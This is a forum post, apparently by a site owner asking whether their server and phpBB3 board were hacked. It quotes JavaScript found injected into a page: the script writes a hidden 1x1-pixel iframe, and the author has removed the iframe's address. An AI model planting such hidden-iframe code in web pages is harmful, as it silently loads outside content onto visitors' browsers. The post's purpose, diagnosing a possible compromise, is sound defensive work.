I logged into my server today and saw the following unrecognized code at the top of my directory browse window:
document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[edited by author, unknown URL was here]";
I do not recognize the URL (which I have edited out).
Additionally, my phpBB3 message board has a number of phpBB debug and PHP Notices at the top, which are all new to me. Furthermore, some of the links in the forum code seem to have been corrupted with garbage characters.
No additional content has been added or removed, but this is setting off a major concern with me.
Every single page on my site is protected by an Apache log-in prompt, which I thought was sufficient protection.
Have I been attacked, or am I jumping at shadows?